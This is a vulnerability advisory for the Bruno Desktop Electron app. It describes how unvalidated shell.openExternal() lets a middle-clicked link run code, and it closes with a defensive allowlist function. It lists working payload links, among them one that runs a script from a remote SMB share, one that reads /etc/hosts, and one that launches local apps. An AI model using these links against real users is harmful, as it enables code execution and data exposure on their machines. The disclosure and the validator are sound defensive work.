Reported by: Rodolfo Tavares ~ opcod3r
The Bruno Desktop Electron app opens new windows using `shell.openExternal()`. This allows an attacker to gain remote code execution on a user's computer if the user middle-clicks a malicious link: the URL passed to `shell.openExternal()` is not validated, so a crafted link can execute code on the victim's machine. The victim has to interact with the link, though, and sees the URL that is opened. Fixed in https://github.com/usebruno/bruno/pull/3122/files
POC Linux: https://youtu.be/SPCGVLEfVgw
POC Windows: https://youtu.be/KVwKQkXA-vI
POC MacOS: https://youtu.be/S0W93tbKaFY
- `[calc](/System/Applications/Calculator.app)` – Opens Calculator on macOS.
- `[calcFile](System/Applications/Calculator.app)` – Another method to trigger Calculator on macOS.
- `[exploit1](smb://10.211.55.6/public/hello.scptd)` – Connects to a remote SMB share and executes a script.
- `[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt)` – Executes a script from a mounted volume on macOS.
- `[file](///etc/hosts)` – Reads the system’s `/etc/hosts` file on macOS/Linux.
- On Windows, the same type of attack can be executed with the link `calc.exe`, which launches the calculator, or potentially other malicious payloads.
- **Protocol exploitation:**
  - `[facetime1](facetime:+123456789)` – Attempts to launch FaceTime with a specific phone number.
  - `[facetime2](facetime:someone@example.com)` – Triggers FaceTime using an email address.
  - `[tel](tel:+123456789)` – Initiates a phone call via the `tel:` protocol.
  - `[mail](x-apple-reminder://)` – Opens the Apple Reminders app via a custom protocol.
  - `[calendar](calendar://)` – Attempts to open a calendar application.
For more detail, watch the PoC videos linked above :)
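As an added example (not Bruno's code and not the fix in PR 3122), the kind of gate a defender puts in front of `shell.openExternal()`: only absolute `http:`/`https:` URLs are forwarded, so bare paths, `file`-style and `smb:` targets and custom schemes like `facetime:` or `calendar:` are refused. The function names and the `shell` injection are assumptions for testability; the sample links are constructed from the payload styles listed above.

```javascript
// Added example, not part of the original report or of Bruno's code.
// Every link must pass isSafeExternalUrl() before reaching shell.openExternal().
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns true only for absolute http(s) URLs. Bare paths such as
// "/System/Applications/Calculator.app", "///etc/hosts" or "calc.exe" are not
// absolute URLs, so the URL constructor throws and they are rejected.
function isSafeExternalUrl(href) {
  if (typeof href !== 'string') return false;
  let url;
  try {
    url = new URL(href);
  } catch {
    return false; // not an absolute URL, never hand it to the OS
  }
  return ALLOWED_SCHEMES.has(url.protocol); // blocks smb:, file:, tel:, facetime:, ...
}

// Wrapper for the Electron call. `shell` is injected (hypothetical interface
// matching Electron's shell.openExternal) so the gate can be tested outside
// Electron. Returns true if the URL was forwarded, false if it was blocked.
function openExternalSafely(shell, href) {
  if (!isSafeExternalUrl(href)) return false;
  shell.openExternal(href);
  return true;
}

// In an Electron main process the gate would sit in the window-open handler,
// e.g. win.webContents.setWindowOpenHandler(({ url }) => {
//   openExternalSafely(shell, url); return { action: 'deny' }; });

// Constructed sample: payload styles from the report plus one benign link.
const SAMPLE_LINKS = [
  '/System/Applications/Calculator.app',
  'System/Applications/Calculator.app',
  'smb://10.211.55.6/public/hello.scptd',
  '///etc/hosts',
  'calc.exe',
  'facetime:+123456789',
  'tel:+123456789',
  'x-apple-reminder://',
  'calendar://',
  'https://example.com/docs', // constructed benign link
];

// Classifies each link so the allow/deny decision can be inspected or logged.
function classifyLinks(links) {
  return links.map((href) => ({ href, allowed: isSafeExternalUrl(href) }));
}
```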